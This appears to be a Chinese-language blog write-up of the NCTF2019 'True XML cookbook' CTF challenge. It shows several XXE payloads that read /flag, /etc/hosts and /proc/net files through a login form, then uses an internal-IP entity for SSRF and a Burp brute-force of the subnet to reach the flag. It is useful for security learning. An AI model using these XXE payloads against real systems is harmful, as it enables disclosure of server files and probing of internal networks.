[NCTF2019]True XML cookbook

打开环境是之前一道题的登录框

qj_oeR6QE2UvS3mP_rzeR4hZRk-QDgZpbgge5Ld68AU

先按原来那道题的payload进行测试，payload和结果如下：

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
	<username>&file;</username>
	<password>1</password>
</user>

la8cQNU9aRKIc6TPMiGCoPrFG-BUDedSftjKfInb3hU

未成功获取到flag信息，那就探测内网信息，读取下系统内的配置文件信息看是否能发现有用的信息，包含：/etc/hosts、/proc/net/arp、proc/net/fib_trie等，最终在proc/net/fib_trie发现一个新的ip：10.244.80.202，结果如下：

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "file:////etc/hosts">
]>
<user>
	<username>&file;</username>
	<password>1</password>
</user>

J5H2iidSQUgjM10oETWcESix2SwSyoP4J0z05m5zcjs

在执行/proc/net/arp会出现两个新的地址，但是其中一个新的地址有时候有，有时候又没有，不知道为什么，看下面中间两张图，但是也对这两个地址按后面的爆破方式进行了爆破，但是未成功。

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "file:////proc/net/arp">
]>
<user>
	<username>&file;</username>
	<password>1</password>
</user>

lpCTYWmiad8oeIE73E3Rl2hDEWvW1E11j49-tcH78uI

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "file:////proc/net/fib_trie">
]>
<user>
	<username>&file;</username>
	<password>1</password>
</user>

dVFsCLCTp8hbC4RLWIkKvyB2HXVvMEJTxGVtxvZwJkQ

这里获得一个新的地址，尝试下进行连接结果如下：

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "http://10.244.80.49/">
]>
<user>
	<username>&file;</username>
	<password>1</password>
</user>

p_Q-dmN8HE7xVzCV0sQkPTTaBQfw2u6QsOwaZxRAc6A

连接失败，那就查询下同网段内存在不存在其他地址，使用bp的爆破模块进行爆破，设置如下：

RzsWr3qNtwLbiszGRtFcVGv4FmnYd1jVv-329Pt9noY

pjPx_vZ9gU2ZurdJ1AjBIFl4Hpl8oxIzg6CRjBXI9B4

等待爆破结果，最终成功获得flag，爆破的结果可能会比较慢，需要等待下，最终结果如下：

xfMghQhihfHQwx7nk5DRoIny9VYqi53P52c0A2HbfUI

posted on 2024-05-20 09:16 跳河离去的鱼阅读(83) 评论(0) 编辑收藏举报

刷新页面返回顶部

fishjumpriver

[NCTF2019]True XML cookbook

[NCTF2019]True XML cookbook

导航

公告